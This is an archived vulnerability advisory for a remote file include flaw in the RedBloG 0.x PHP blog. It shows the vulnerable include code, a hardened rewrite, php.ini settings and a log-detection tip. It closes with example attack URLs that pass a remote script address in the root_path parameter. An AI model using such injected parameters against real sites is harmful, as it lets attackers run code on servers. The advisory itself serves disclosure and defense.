SECURITYVULNS:DOC:14392
Sep 23, 2006

RedBloG 0.x Multiple Remote File Include

Source: vulners.com

###########################################

RedBloG 0.x Multiple Remote File Include

Discovered: KeyCoder

HomePage: http://keycoder.blogspot.com

Contact: keycoder[at]msn[dot]com

Greetz: SecretlyX-BeLa-BodyGuarD

###########################################

Details:

RedBloG 0.x Multiple (root_path) Remote File Include Vulnerability

Script : http://sourceforge.net/projects/redblog

Vulnerable Files: /admin/index.php, /admin/config.php, /imgen.php, /common.php

Risk: High

Class: Remote


#Vulnerable Files Detail:

/admin/index.php

define('REDBLOG', true);
$root_path='./…/';   // base path assigned here; the includes below are built from it
require_once($root_path . 'common.php');
require_once($root_path . 'includes/functions.php');

/admin/config.php

define('REDBLOG', true);
$root_path='./…/';   // same pattern as /admin/index.php
require_once($root_path . 'common.php');
require_once($root_path . 'includes/functions.php');

/imgen.php

define('REDBLOG', true);
define('IMGEN', true);
$root_path='./';   // base path assigned here as well
require_once($root_path . 'common.php');

/common.php

// $root_path is never assigned in this file: every include below is built
// from whatever value is already in scope when common.php is reached
require_once($root_path . 'config.php');
require_once($root_path . 'includes/constants.php');
require_once($root_path . 'includes/template.php');
require_once($root_path . 'includes/db.php');
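Added example (not code from the advisory or from the RedBloG project): the common.php include pattern shown above, rewritten so that the base path can never be supplied by a request. The REDBLOG guard constant and the included filenames are taken from the excerpts; REDBLOG_ROOT, redblog_safe_include_path() and redblog_require() are names assumed for this example.

```php
<?php
// Added example, not RedBloG's code: the include pattern from the excerpts
// above, rewritten so that the base path cannot come from the request.
//
// Why the original pattern is exposed: common.php builds every require_once()
// from $root_path but never assigns it. When PHP runs with register_globals=On,
// a request parameter named root_path becomes the global $root_path, and with
// URL includes enabled the "file" is fetched from a remote host and executed.
// The fix below removes the variable from the equation entirely.

// --- common.php (hardened) ---

// 1. Library files must only be reached through an entry script that defined
//    the REDBLOG guard constant first (the original entry scripts already do).
if (!defined('REDBLOG')) {
    header('HTTP/1.1 403 Forbidden');
    exit('Direct access not permitted');
}

// 2. The application root is derived from this file's own location, a value
//    no request can influence. (dirname(__FILE__) is the pre-5.3 form of __DIR__.)
define('REDBLOG_ROOT', dirname(__FILE__) . DIRECTORY_SEPARATOR);

// 3. Includes are chosen from a fixed allow-list and resolved with realpath(),
//    which rejects URLs, missing files and any ../ that escapes the root.
//    Returns the resolved absolute path, or false when the include is refused,
//    so the decision can be tested separately from require_once().
function redblog_safe_include_path($relative, $root = REDBLOG_ROOT)
{
    static $allowed = array(
        'config.php',
        'includes/constants.php',
        'includes/template.php',
        'includes/db.php',
        'includes/functions.php',
    );
    if (!in_array($relative, $allowed, true)) {
        return false;                       // unknown filename
    }
    $rootReal = realpath($root);
    $real     = realpath($root . $relative);
    if ($rootReal === false || $real === false) {
        return false;                       // root or file does not exist (URLs fail here too)
    }
    // Prefix check with a trailing separator so that /var/www/app2 is not
    // accepted as lying inside /var/www/app.
    if (strpos($real, $rootReal . DIRECTORY_SEPARATOR) !== 0) {
        return false;                       // resolved path escapes the root
    }
    return $real;
}

function redblog_require($relative)
{
    $path = redblog_safe_include_path($relative);
    if ($path === false) {
        trigger_error('Refusing to include: ' . $relative, E_USER_ERROR);
    }
    require_once $path;
}

redblog_require('config.php');
redblog_require('includes/constants.php');
redblog_require('includes/template.php');
redblog_require('includes/db.php');
```

The code-level fix is only half of the mitigation: the same class of bug is neutralised at the interpreter level by setting register_globals = Off (the default since PHP 4.2 and removed entirely in 5.4) and allow_url_include = Off in php.ini (available from PHP 5.2; on older releases allow_url_fopen = Off is what stops include() from fetching URLs). For detection, requests carrying a root_path parameter whose value begins with a URL scheme are the signal to alert on in web-server access logs.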

##########################################
Examples:
##########################################
http://host/Path/admin/index.php?root_path=[evilscript]
http://host/Path/admin/config.php?root_path=[evilscript]
http://host/Path/imgen.php?root_path=[evilscript]
http://host/Path/common.php?root_path=[evilscript]

#Original advisory: http://keycoder.blogspot.com/2006/09/redblog-05-multiple-remote-file.html